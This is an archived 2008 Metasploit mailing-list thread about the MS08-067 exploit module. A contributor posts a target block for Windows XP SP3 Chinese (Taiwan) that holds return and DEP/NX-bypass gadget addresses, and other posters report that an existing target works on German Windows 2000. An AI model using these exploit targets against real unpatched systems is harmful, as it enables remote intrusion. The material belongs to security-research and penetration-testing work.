Metasploit mailing list archives

MS08-067 added to SVN trunk (3.2-testing)


From: basehat at gmail.com (base64)
Date: Sat, 1 Nov 2008 19:30:33 -0700

Here is the target for xp sp3 chinese (taiwan).

# Metasploit's NX bypass for XP SP3
# Target provided by Adrian Castro <basehat at gmail.com>
#
[ 'Windows XP SP3 Chinese (Taiwan) (NX)',
    {
        'Ret'       => 0x5860f807,
        'DisableNX' => 0x586117c2,
        'Scratch'   => 0x00020408,
    }
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL



On Sat, Nov 1, 2008 at 7:20 PM, H D Moore <hdm at metasploit.com> wrote:

Excellent, I think it uses svchost.exe as a return, which is mostly static
across different language packs.

On Saturday 01 November 2008, think.pink at gmx.de wrote:
Just to let you now, target 0 (Windows 2000 english) works also
brilliant against Windows 2000 SP4 German  :-)


_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework




-- 

Best Regards,
Adrian Castro
Senior Software Engineer
(310)765-0627
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081101/4487f4dd/attachment.htm>


Current thread: